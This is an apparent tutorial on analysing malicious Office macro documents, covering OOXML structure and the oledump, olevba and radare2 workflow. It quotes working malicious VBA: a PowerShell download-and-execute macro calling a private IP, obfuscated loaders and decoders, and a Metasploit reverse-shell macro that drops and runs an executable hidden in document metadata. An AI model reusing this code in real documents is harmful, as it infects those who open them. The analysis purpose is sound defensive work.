Analyzing Malware Documents
Having the possibility of including code within a file allows for certain tasks to be carried out when handling documents. Whether that is to enhance the content or to process data within the document. However, having this feature has been abused by malicious actors for a long time and little can be done to mitigate this attack vector without removing the functionality from the document.
Microsoft includes the ability to embed Visual Basic for Applications code within Office documents since 1993 with the first version being implemented in Excel. Allowing the users to record actions to automate working with documents.
Visual Basic for Applications or VBA is based off of Visual Basic 6, which it's Microsoft's event-driven programming language that was discontinued back in 2008. However, the language lives on in VBA and it facilitates automating tasks within Office Documents and also in VBScripts.
Office Document Structure
In early 2000, Microsoft changed the file format from a single binary file that had a closed standard to the open standard, which utilizes XML files to make up the file. It became the default format in Office 2007.
Officially called the Office Open XML and differentiated with an x at the end of the extension, the file itself is made up of mainly XML files which are contained in a zip archive. Besides XML files, any other files that are inserted into the document are also included within the zip archive.
Within the zip archive there are some files that exist independent of the type of document, these are the Metadata files, and files that exist depending on the type of document, these are called respectively Document and are stored in a directory with the document type as the name.
The contents of the archive may differ depending on the program that created the file.
Metadata Files
There are 3 files that are used for this section
- Content Types: This XML file specifies the file type for any of the extensions of the files that are included within the archive. The file is named
[Content_Types].xml
- Relationships: The files that end in
.rels
act as a type of index file, meaning that this tells the program where to locate all of the files that are related to the different parts that make up the document. It is located in_rels/.rels
, that contains the details for the primary files within the document. - References to Resources: Each component, for example a page within a Word document, will have it's own
_rels/<resource>.xml.rels
file that points to other files that have a relation with the specific resource, for example including an entry for an image file that is shown in one of the pages of the Word document.
Document Properties
Located in the directory docProps
, this contains two XML files that contains the properties of the document
- app.xml: This file contains several file properties that relate to the application, including metrics data and program versions
- core.xml: This file contains document data such as Title, author, timestamps, among other properties. Some properties may be user modifiable and others are controlled by the program.
Main Document Contents
The document contents are included in this directory and the directory name depends on the program that creates the file
- word: Word Documents
- ppt: PowerPoint Presentations
- xl: Excel Spreadsheets
The contents of this directory will vary between the format types, however, they mainly include any styling data and the distribution of the document contents.
Macros may also be included within this directory or they may exist in a separate Macros
directory.
Media
This directory includes any media, such as images, that are inserted into the document.
Malware in Macros
Malware is often embedded within Office documents and use enticing names and messages to have users open the documents and ignore any alerts.
Original versions of Office would automatically execute any macros that were included, which made it easier for malicious actors as they would only need to have the victim open the file. Due to this, Microsoft changed the way the Macros work and now it requires user intervention to start the execution of the macro, the user is alerted of the risk of running macros in unknown files.
Because of this change, malicious actors need to resort to creative measures to have the victim ignore the alert and run the macro code. Corporate environments may use macros within their documents and don't always take into consideration the employee education or signing the documents to avoid any alerts, this results in users being educated to ignore the alerts and makes it easier for the malicious actors.
There are multiple ways that the macros can be abused to attack the victim's system. There are some cases where the malware is within the code itself or it may encode a binary file that is then decoded, saved to disk, and executed.
Recent cases are using the Office document as a first stage, where PowerShell code is leveraged to download a second stage which contains the actual malware. Due to current detection mechanisms in different security tools used, the malicious actors need to encode payloads and commands with different methods which include simple encoding algorithms, such as Base64, and reversing strings or obfuscating the strings within the code.
A simple example for a first stage using macros is shown in How to create Microsoft Office macro malware – phishing attack
Sub Auto_Open()
Dim exec As String
exec = “powershell.exe “”IEX ((new-object net.webclient).downloadstring(‘http://192.168.1.104/tar.txt’))”””
Shell (exec)
End Sub
In this example, the attack is simple and is not obfuscated, the code simply downloads a file from a web server and executes it using PowerShell. The code in the PowerShell script could contain malicious intent in the way of being a second stage or even establishing a reverse shell, the possibilities are endless.
During an investigation, it would be necessary to download any additional files that the macro downloads in order to create the complete picture and look for indicators of compromise, these can be used to look for other systems that may have been infected or even establish monitoring rules to look out for new victims.
Parts of the malware can be placed within the metadata of the document, this serves as an easy hiding spot and can be quickly changed without having to go into the code to alter the payload.
Entry Point
For macro codes, there are several functions that can act as an entry point for the execution, this will depend on the intention or obfuscation method that the malicious actor may choose. It's more common for certain security applications to open email attachments for quick analysis, in order to avoid the malware from being triggered from the start, the malicious actor can use a different function that triggers the malware execution at a different point or under certain conditions.
Below is a sample obfuscated code that serves as the entry point for the malware, where the function DecodeDocument
is used
Attribute VB_Name = "NewMacros"
Sub DecodeDocument()
Attribute DecodeDocument.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.DecodeDocument"
'
' DecodeDocument Macro
'
'
Dim d3h5dHh5U3BwaWxX
ODppd2VGaGloc2dpSA = ThisDocument.BuiltInDocumentProperties(Chr(67) + Chr(111) + Chr(109) + Chr(109) + Chr(101) + Chr(110) + Chr(116) + Chr(115))
a3JtdnhXZ212aXF5UmVsdHBF = aWhzZ2lI("3/=<;:987654~}|{zyxwvutsrqponmlkjihgfe^]\[ZYXWVUTSRQPONMLKJIHGFE")
d2hyZXFxc0doaWhzZ2lI = QmFzZTY0X0RlY29kZQo(ODppd2VGaGloc2dpSA, a3JtdnhXZ212aXF5UmVsdHBF)
eHxpWHJtZXBU = aWhzZ2lI(d2hyZXFxc0doaWhzZ2lI)
d3h5dHh5U3BwaWxX = Shell(eHxpWHJtZXBU, vbHide)
End Sub
Base64 Decode Function
The VBA implementation does not contain a function or library that can quickly encode or decode Base64, however, it can be easily implemented using other areas of Office, an example is shown with the following code
Private Function EncodeBase64(ByRef arrData() As Byte) As String
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
' byte array to base64
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.nodeTypedValue = arrData
EncodeBase64 = objNode.Text
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
Malicious actors may sometimes create their own implementation of certain functionality within the malware, this can be done for various reasons, one of them is because there is no simpler way to do this within the language or it could also be to obfuscate the code. It is also common for only decoders to be included within the code of the macro, specially in cases where the macro code doesn't need to encode any data.
Below is an obfuscated Base64 decoder that is found in a sample malware
Function QmFzZTY0X0RlY29kZQo(GYDozL, xbZuLutP)
Dim VAIXQ,vgDKwiF,cWBqjCKwBl,CBnhtvROBWJf,VdNmpUUu,uOatMJ,GkdMVutOqmk,fqcaXNK,StBHym,NDXnaxDDQ,iXQiRtcgmWEUplc
CBnhtvROBWJf = 2
VAIXQ = bGVuZ3RoCg(GYDozL)
VdNmpUUu = 8
uOatMJ = 16 * 4
For cWBqjCKwBl = 1 To VAIXQ Step 4
Dim zIlis,OaRRODd,WuFeJHdca,MmrJRSmq,EgnwkcNgcIgofn,dzYTBeK,xuRJndLZwLYPC,URJApvGRUMy,lpIcVNAjHiIgkw,ONOzKt,SdwnMSAxfcsNR
zIlis = 3
EgnwkcNgcIgofn = 0
For OaRRODd = 0 To 3
WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)
If WuFeJHdca = "=" Then
zIlis = zIlis - 1
MmrJRSmq = 0
Else
MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
End If
EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq
Next
EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn
dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _
Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _
Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))
vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)
Next
QmFzZTY0X0RlY29kZQo = vgDKwiF
End Function
The function accepts two parameters:
- GYDozL = Base64 encoded string
- xbZuLutP = Alphanumeric string
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
There are also variables that are used as decoy, meaning that their values are never utilized after being assigned and this can also be done with functions, where multiple functions can be created, but never used or functions can be called but their output is never used.
Encoding is not used with security in mind, it's used with the idea of making commands not easily detectable or due to encoding conversion or when transferring data over the Internet not risking parts of the code being lost.
For this next sample code, the characters are moved over by 4 bytes, in a ROT13 style, and then the whole string is reversed.
Function aWhzZ2lI(a3JtdnhXaGloc2dySQ)
Dim b As String, i As Long, a() As Byte, sh
a = StrConv(a3JtdnhXaGloc2dySQ, vbFromUnicode)
For i = 0 To UBound(a)
a(i) = a(i) - 4
Next i
b = StrReverse(StrConv(a, vbUnicode))
aWhzZ2lI = b
End Function
There is only one input parameter, which is the string that is encoded.
One way to analyze a function is to look at what parameters the functions are called with and what output they return, it is still important to look for any calls that may execute any commands outside of the code or Office document.
Renaming Functions
Given that VBA doesn't have the possibility to rename functions, like languages like JavaScript allows, a workaround is to create a function that simply returns the value that the other function returns.
In this example, to obfuscate the function Len, a function is created with a random string of characters.
Function bGVuZ3RoCg(c3RyaW5nCg)
bGVuZ3RoCg = Len(c3RyaW5nCg)
End Function
Document Analysis
This section shows a quick analysis of a Word document. Microsoft Office documents that have a macro embedded receive an extension that ends with the letter m
, though this can be changed.
The first step is to check the contents of the archive, the 7-zip utility can be used for this task
❯ 7z l Doc5.docm
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (806E9),ASM,AES-NI)
Scanning the drive for archives:
1 file, 26568 bytes (26 KiB)
Listing archive: Doc5.docm
--
Path = Doc5.docm
Type = zip
Physical Size = 26568
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
1980-01-01 00:00:00 ..... 1585 413 [Content_Types].xml
1980-01-01 00:00:00 ..... 590 239 _rels/.rels
1980-01-01 00:00:00 ..... 4526 1557 word/document.xml
1980-01-01 00:00:00 ..... 1081 301 word/_rels/document.xml.rels
1980-01-01 00:00:00 ..... 27648 10834 word/vbaProject.bin
1980-01-01 00:00:00 ..... 8393 1746 word/theme/theme1.xml
1980-01-01 00:00:00 ..... 277 191 word/_rels/vbaProject.bin.rels
1980-01-01 00:00:00 ..... 2474 609 word/vbaData.xml
1980-01-01 00:00:00 ..... 3194 1105 word/settings.xml
1980-01-01 00:00:00 ..... 241 155 customXml/item1.xml
1980-01-01 00:00:00 ..... 341 225 customXml/itemProps1.xml
1980-01-01 00:00:00 ..... 29364 2924 word/styles.xml
1980-01-01 00:00:00 ..... 803 313 word/webSettings.xml
1980-01-01 00:00:00 ..... 1567 502 word/fontTable.xml
1980-01-01 00:00:00 ..... 991 572 docProps/core.xml
1980-01-01 00:00:00 ..... 1041 524 docProps/app.xml
1980-01-01 00:00:00 ..... 296 194 customXml/_rels/item1.xml.rels
------------------- ----- ------------ ------------ ------------------------
1980-01-01 00:00:00 84412 22404 17 files
The fact that there is a vbaProject.bin.rels
file confirms that there is a macro present within the document, this could be a red flag if there is no expectation of a macro being embedded within the document. Further analysis should be carried out in order to determine if the code is malicious or not.
Extracting Macro Source Code
There are tools that are able to extract source code from the document, such as oledump
. This tool can be used to analyze the document.
❯ oledump Doc5.docm
A: word/vbaProject.bin
A1: 412 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 7836 'VBA/NewMacros'
A4: m 1135 'VBA/ThisDocument'
A5: 5028 'VBA/_VBA_PROJECT'
A6: 3195 'VBA/__SRP_0'
A7: 340 'VBA/__SRP_1'
A8: 3399 'VBA/__SRP_2'
A9: 366 'VBA/__SRP_3'
A10: 348 'VBA/__SRP_4'
A11: 106 'VBA/__SRP_5'
A12: 571 'VBA/dir'
The output above shows multiple objects that are identified by the A code at the start of the line and can be easily extracted with the following command
oledump Doc5.docm -v -s A3
This would output the object A3, which is the source code of the macro that is contained within the document, this is also identified by the capital M found on the first output.
Not all macros will execute upon loading the document in an Office program, this can be done to avoid automatic analysis with sandbox tools. The function autoopen
would be used for those documents that do execute the code upon opening, the following code is an example of this case
Sub autoopen()
MsgBox ("hello world")
End Sub
After the code is extracted, it should be analyzed to determine what is useful and what can be safely discarded. Look for aspect where the code carries out possible dangerous commands and if they can be safely replaced to output to a message box or terminal, instead of executing other commands.
Tool olevba
Another tool to extract the source code is olevba
, below is the sample document being analyzed with this tool
❯ olevba Doc5.docm
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: Doc5.docm
Type: OpenXML
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'.
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[..SOURCE CODE..]
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|vbHide |May run an executable file or a system |
| | |command |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|StrReverse |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
+----------+--------------------+---------------------------------------------+
An advantage of this tool is that it provides some parts of the code that are often used in malicious macro codes, which can be an initial step to determining whether the macro might be malicious or not and a starting point on what to check.
Extracting Metadata
In newer Office documents, the metadata is stored in a file called core.xml
and can be viewed with the command xmllint
xmllint --format core.xml
The output is formatted and can be easily read
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title>JXZzaiRrc[..SNIP..]SR3bWxY</dc:title>
<dc:subject/>
<dc:creator>Document Author</dc:creator>
<cp:keywords>WW91J3JlIGluIHR[..SNIP..]XJkZXIh</cp:keywords>
<dc:description>gWpoNDZoPTZqNzlpPTE5O2l[..SNIP..]HBpbHd2aXtzdA</dc:description>
<cp:lastModifiedBy>Document Author</cp:lastModifiedBy>
<cp:revision>7</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2020-07-16T00:41:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-16T00:55:00Z</dcterms:modified>
</cp:coreProperties>
There are a couple of encoded strings visible and the macro makes reference to the metadata. Having encoded strings in the metadata can also be a red flag, these can often contain other data that the macro needs, such as having URL or IP addresses of where to download another stage. Decoding them can provide more details, though it may be possible that multiple encodings are used.
Metasploit Reverse Shell
This is a reverse shell macro that was created using Metasploit, this is a good beginner sample that can be used to practice analysis of malware documents. This section is a walkthrough of how to check this document.
First checking the file using oledump
shows the following output
A: word/vbaProject.bin
A1: 385 'PROJECT'
A2: 71 'PROJECTwm'
A3: M 5871 'VBA/NewMacros'
A4: m 1073 'VBA/ThisDocument'
A5: 4400 'VBA/_VBA_PROJECT'
A6: 734 'VBA/dir'
When extracting the content of the object A3, this is the object that is checked as it has the letter M
and this is used by the oledump
tool to denote macro code.
Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
For Each prop In ActiveDocument.BuiltInDocumentProperties
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
System ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
'rfc1521
'1999 Antonin Foller, Motobit Software, http://Motobit.cz
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
The source code on this instance is not obfuscated, which makes it easier to analyze, and there is a check for the OS that is running so that different commands are used. There is a reference to the Comments property that is found in the metadata.
Checking the core.xml file it shows a big block of data in the description field
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title/>
<dc:subject/>
<dc:creator/>
<cp:keywords/>
<dc:description>TVqQAAMAAA[...]GFiLnBkYgA=</dc:description>
<cp:lastModifiedBy>Wei Chen</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
<cp:category/>
</cp:coreProperties>
The long string is encoded using Base64, when decoding the data it results in a binary file.
Checking the Windows executable with Radare2 shows the following
❯ r2 msf.dat
[0x00407354]> i
fd 3
file msf.dat
size 0x1204a
humansz 72.1K
mode r-x
format pe
iorw false
blksz 0x0
block 0x100
type EXEC (Executable file)
arch x86
baddr 0x400000
binsz 73802
bintype pe
bits 32
canary false
retguard false
class PE32
cmp.csum 0x000125dd
compiled Tue Apr 14 04:46:43 2009
crypto false
dbg_file C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb
endian little
havecode true
hdr.csum 0x00000000
guid 4AC180361
laddr 0x0
lang c
linenum true
lsyms true
machine i386
maxopsz 16
minopsz 1
nx false
os windows
overlay true
cc cdecl
pcalign 0
pic false
relocs true
signed false
sanitiz false
static false
stripped false
subsys Windows GUI
va true
The binary analysis of this is out of the scope of this documentation, however, it establishes a reverse shell back to the attacker.